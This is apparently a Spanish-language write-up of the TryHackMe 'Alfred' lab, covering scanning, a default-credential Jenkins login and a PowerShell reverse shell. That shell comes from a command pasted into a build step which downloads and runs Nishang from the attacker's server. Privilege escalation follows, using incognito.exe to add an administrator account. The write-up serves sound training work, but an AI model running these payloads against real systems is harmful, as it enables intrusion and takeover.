Alfred

Apr 30, 2021
THM Windows

nmap -A -p- -oA output 10.10.32.27 —min-rate=10000 —script=vuln —script-timeout=15 -v

ssh_command.

nmap -sC -sV -O -p- -oA optimum 10.10.32.27

nmap -sU -O -p- -oA optimum-udp 10.10.32.27

nikto -h 10.10.32.27:80

gobuster dir -k -u http://10.10.32.27/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100

ssh_command.

Vemos el puerto 8080 y nos logeamos con admin/admin en jenkins

ssh_command.

Nos metemos a 10.10.32.27/job/project/configure y vemos que tienen un lugar para ejecutar comandos de batch en windows

ssh_command.

hacemos un locate Invoke-PowerShellTcp.ps1 cp /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1 . Invoke-PowerShellTcp -Reverse -IPAddress 10.6.72.57 -Port 3333

ssh_command.

python3 -m http.server 8888

En el textbox de jenkins ponemos lo siguiente para ejecutar el script de powershell

powershell iex (New-Object Net.WebClient).DownloadString(”http://10.6.72.57:8888/Invoke-PowerShellTcp.ps1’) Guardamos

rlwrap nc -lvnp 3333

ssh_command.

Le damos click a Build Now

systeminfo

ssh_command.

whoami /priv

ssh_command.

sudo python2 /usr/share/doc/python-impacket/examples/smbserver.py temp ~/Desktop/boxes/incognito2

ssh_command.

En la maquina de windows

cd windows\temp copy \10.6.72.57\temp\incognito.exe dir

ssh_command.

./incognito.exe add_user cu3rv0x asi_es ./incognito.exe add_localgroup_user Administrators cu3rv0x

ssh_command.